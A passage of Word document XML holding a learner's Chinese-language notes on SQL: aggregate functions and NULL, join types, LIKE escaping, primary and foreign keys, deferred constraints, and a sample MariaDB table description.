      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>值的影响：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>COUNT(*)</w:t>
      </w:r>
      <w:r>
        <w:t>总是返回记录的个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>COUNT(</w:t>
      </w:r>
      <w:r>
        <w:t>字段</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>返回指定字段值非空的记录个数。</w:t>
      </w:r>
      <w:r>
        <w:t>avg</w:t>
      </w:r>
      <w:r>
        <w:t>函数就不会将</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>考虑进去。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>COUNT([DISTINCT|ALL] &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;) </w:t>
      </w:r>
      <w:r>
        <w:t>统计一列中值的个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>SUM([DISTINCT|ALL] &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;) </w:t>
      </w:r>
      <w:r>
        <w:t>计算一列值的总和（此列必须是数值型）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>AVG([DISTINCT|ALL] &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;) </w:t>
      </w:r>
      <w:r>
        <w:t>计算一列值的平均值（此列必须是数值型）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>MAX([DISTINCT|ALL] &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;) </w:t>
      </w:r>
      <w:r>
        <w:t>求一列值中的最大值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>MIN([DISTINCT|ALL] &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;) </w:t>
      </w:r>
      <w:r>
        <w:t>求一列值中的最小值</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">[DISTINCT|ALL] </w:t>
      </w:r>
      <w:r>
        <w:t>就是可以加到操作语句的列名前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>多表查询中的连接：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>交叉连接：</w:t>
      </w:r>
      <w:r>
        <w:t>[&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>表名</w:t>
      </w:r>
      <w:r>
        <w:t>1&gt;.]&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:t>1&gt; &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>比较运算符</w:t>
      </w:r>
      <w:r>
        <w:t>&gt; [&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>表名</w:t>
      </w:r>
      <w:r>
        <w:t>2&gt;.]&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>列名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>内连接（表间操纵，而不是表内操作）：</w:t>
      </w:r>
      <w:r>
        <w:t>SELECT * FROM Student INNER JOIN SC ON Student.Sno=SC.Sno;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>《</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>》</w:t>
      </w:r>
      <w:r>
        <w:t>SELECT Student.*, SC.*  FROM Student, SC WHERE Student.Sno=SC.Sno;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SELECT * FROM Student NATURAL JOIN SC;  </w:t>
      </w:r>
      <w:r>
        <w:t>相同字段的名字都会被显示出来</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>外连接（内连接的基础上返回了一些悬浮元组）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  OUTER </w:t>
      </w:r>
      <w:r>
        <w:t>关键词可以省略</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>左外连接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LEFT OUTER JOIN</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>根据相同的字段，左表全部行与右表进行匹配（如果没有匹配的，相当于右边部分全为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>右外连接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RIGHT OUTER JOIN</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>右表全部行，去与左表匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>全外连接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FULL OUTER JOIN</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>上面两个结果的并集</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>交叉连接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CROSS JOIN</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>左表全部行与右表全部行完全匹配，就是爆破中完全爆破一样。</w:t>
      </w:r>
      <w:r>
        <w:t>4*4=16</w:t>
      </w:r>
      <w:r>
        <w:t>。所以这个后面不需要接上</w:t>
      </w:r>
      <w:r>
        <w:t>on xxxx</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>john Type</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>inner join</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>left outer join</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>right outer join</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>full outer join</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>john Conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>natural</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>on &lt;predicate&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>using (A1,A2,....An)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT * FROM Student NATURAL JOIN SC;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>选用修饰</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>IS TRUE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>IS NOT TRUE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>IS FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>IS NOT FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT Sname, Sgender</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  FROM Student</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  WHERE Sdept NOT IN (‘CS’,’MA’,’IS’) IS NOT FALSE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>-- exists</w:t>
      </w:r>
      <w:r>
        <w:t>的简化版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>需要转义字符只有</w:t>
      </w:r>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>_</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT Cno, Ccredit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  FROM Course</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  WHERE Cname LIKE ‘DB\_Design’ ESCAPE ‘\’; --escape ‘-’</w:t>
      </w:r>
      <w:r>
        <w:t>是设置自己指定的转义字符。不幸，</w:t>
      </w:r>
      <w:r>
        <w:t>posgres</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:t>客户端下恰好不能用</w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>。这时候推荐使用</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>唯一索引允许有空值存在，但是只能存在一个。主键索引不允许使用空值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>主键</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>唯一标识一条记录，不能有重复的，不允许为空</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>用来保证数据完整性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>主键只能有一个（一个表的主键可以由多个关键字、或者称为属性组共同组成）。一般应该选择从不变化或极少变化的属性。有的人认为：主键应对用户无意义的原则。但是实际上并不是这样</w:t>
      </w:r>
      <w:r>
        <w:t>L:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>大多数增长型和变更型表应该使用逻辑主键，比如例子中的</w:t>
      </w:r>
      <w:r>
        <w:t>SR</w:t>
      </w:r>
      <w:r>
        <w:t>表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>大多数基准型表应该使用业务主键，比如例子中的</w:t>
      </w:r>
      <w:r>
        <w:t>SI</w:t>
      </w:r>
      <w:r>
        <w:t>表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>业务主键（自然主键）：在数据库表中把具有业务逻辑含义的字段作为主键，称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>自然主键</w:t>
      </w:r>
      <w:r>
        <w:t>(Natural Key)”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>逻辑主键（代理主键）：在数据库表中采用一个与当前表中逻辑信息无关的字段作为其主键，称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>代理主键</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>其实不明白逻辑主键的存在原因</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>主键与业务数据分离，这样就不会被修改。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>复合主键（联合主键）：通过两个或者多个字段的组合作为主键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>外键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>表的外键是另一表的主键</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>外键可以有重复的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>可以是空值。但是会对值进行限制，必须要已经存在在对应的表中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>用来和其他表建立联系用的（比如说删除了以后数据库会自动根据联系将指定的记录也删除）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>一个表可以有多个外键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>设置外键的表叫做参照表，被连接的表叫做被参照表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果两个表相互依赖（外键指向），那么：使用</w:t>
      </w:r>
      <w:r>
        <w:t>initially deferred</w:t>
      </w:r>
      <w:r>
        <w:t>推迟检查，从而插入数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">alter table employee </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  add constraint employee_fk_dno foreign key (dno) references department initially deferred;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>alter table department</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  add constraint department_fk_mgr_ssn foreign key (mgr_ssn) references employee(ssn) initially deferred; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>该字段没有重复值，但可以有一个空值（于是就是三态）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>一个表可以有多个惟一索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>主键应当是对用户没有意义的。如果用户看到了一个表示多对多关系的连接表中的数据，并抱怨它没有什么用处，那就证明它的主键设计地很好。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>永远也不要更新主键。实际上，因为主键除了唯一地标识一行之外，再没有其他的用途了，所以也就没有理由去对它更新。如果主键需要更新，则说明主键应对用户无意义的原则被违反了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>注：这项原则对于那些经常需要在数据转换或多数据库合并时进行数据整理的数据并不适用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>主键不应包含动态变化的数据，如时间戳、创建时间列、修改时间列等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t>主键应当由计算机自动生成。如果由人来对主键的创建进行干预，就会使它带有除了唯一标识一行以外的意义。一旦越过这个界限，就可能产生人为修改主键的动机，这样，这种系统用来链接记录行、管理记录行的关键手段就会落入不了解数据库设计的人的手中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>create table sc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  sno char(10),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  cno char(5),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  grade int,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  primary key(sno, cno),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  foreign key(sno) references student,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  foreign key(cno) references course, //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>匿名的约束条件？系统会自己产生一个名字，不然不能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>drop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">  check (grade&gt;=0 and grade &lt;=100)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>select *  from sc group by cno,sno; cno</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>sno</w:t>
      </w:r>
      <w:r>
        <w:t>都要成为</w:t>
      </w:r>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:t>的对象，如果要显示</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>的话，这时候</w:t>
      </w:r>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:t>其实是失效的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">group by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>要求除了被分组的字段，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>后面的其余字段都应该使用聚合函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>设置了主键以后在数据库的交互界面中</w:t>
      </w:r>
      <w:r>
        <w:t>insert into</w:t>
      </w:r>
      <w:r>
        <w:t>可以给主键随便插入值，但是用编程语言去连接就不能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [collage]&gt; describe ITclass;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+--------------+--------------+------+-----+---------+----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| Field        | Type         | Null | Key | Default | Extra          |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+--------------+--------------+------+-----+---------+----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| id           | int(3)       | NO   | PRI | NULL    | auto_increment |//auto_increment</w:t>
      </w:r>
      <w:r>
        <w:t>要自己设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| name         | varchar(30)  | YES  |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| use_model    | varchar(100) | YES  |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| url          | varchar(200) | YES  |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| code         | varchar(10)  | YES  |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| introduction | varchar(400) | YES  |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| question1    | varchar(400) | YES  |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| question2    | varchar(400) | YES  |     | NULL    |                |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+--------------+--------------+------+-----+---------+----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>8 rows in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>定义主键：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MySQL / SQL Server / Oracle / MS Access:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">ALTER TABLE Persons </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ADD </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PRIMARY KEY (Id_P) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>理解为表定义的时候要补充语句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>constraint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果需要命名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PRIMARY KEY </w:t>
      </w:r>
      <w:r>
        <w:t>约束，以及为多个列定义</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PRIMARY KEY </w:t>
      </w:r>
      <w:r>
        <w:t>约束，请使用下面的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:t>语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MySQL / SQL Server / Oracle / MS Access:</w:t>
